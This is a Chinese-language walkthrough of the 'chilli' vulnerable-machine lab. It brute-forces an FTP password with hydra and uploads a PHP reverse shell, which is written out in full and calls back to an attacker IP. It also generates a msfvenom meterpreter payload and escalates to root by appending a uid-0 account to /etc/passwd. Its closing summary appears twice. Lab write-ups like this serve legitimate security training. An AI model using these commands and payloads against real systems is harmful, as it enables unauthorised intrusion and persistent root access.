chilli
信息搜集
存活检测
详细扫描
后台扫描
未发现后台
网页源代码查看
未发现有用信息
ftp 密码爆破
-
尝试用户名 chili 使用 hydra 对 ftp 进行密码爆破
hydra -l chili -P /usr/share/wordlists/rockyou.txt ftp://192.168.245.130 -vV -I -f -t 64
爆破出密码 a1b2c3d4
-
ftp 登录,搜集有用信息
进入 /var/www/html 目录后发现具有读写执行最高权限的 .nano 目录
尝试在目录中传入木马
webshell
方法1
-
上传 webshell.php 文件到 .nano 目录下
<?php $ip='192.168.245.128'; $port=8888; $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh ' , $descriptorspec,$pipes); proc_close($process);
put webshell /var/www/html/.nano
-
赋权
chmod 777 webshell.php
-
kali 开启 nc 监听
nc -lvvp 8888
-
浏览器输入 php 文件地址连接反弹 shell
方法2
-
生成 php 木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=8888 R>shell.php
-
将木马上传到 .nano 目录下
put shell.php /var/www/html/.nano
-
赋权
chmod 777 shell.php
-
kali 启动木马程序
msfconsole
-
配置攻击载荷
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost=192.168.245.128 set lport=8888 run
-
网页访问 192.168.245.128/.nano/shell.php
-
连接成功
-
输入 shell 获取 webshell
提权
-
使用提权检测工具
将检测工具下载到 kali,开启 http 服务
-
在靶机上使用 weget 命令下载,赋权并运行漏洞检测脚本
-
检测出漏洞,有对 passwd 文件的读写权限
-
生成加密后的密码
/usr/bin/perl -le 'print crypt("123","aa")'
生成加密的密码 aamrgyQfDFSHw
-
新建 root 用户
echo 'gjl:aamrgyQfDFSHw:0:0:root:/root:/bin/bash' >> /etc/passwd
-
登录新建的用户
su gjl
提权成功
总结
-
拥有 /etc/passwd 文件写入权限时,新建 root 用户
加密密码可用
/usr/bin/perl -le 'print crypt("123","aa")'
计算其他版本 linux(kali)同样适用
[外链图片转存中...(img-wQCb2ShY-1696401537110)]
提权成功
总结
-
拥有 /etc/passwd 文件写入权限时,新建 root 用户
加密密码可用
/usr/bin/perl -le 'print crypt("123","aa")'
计算其他版本 linux(kali)同样适用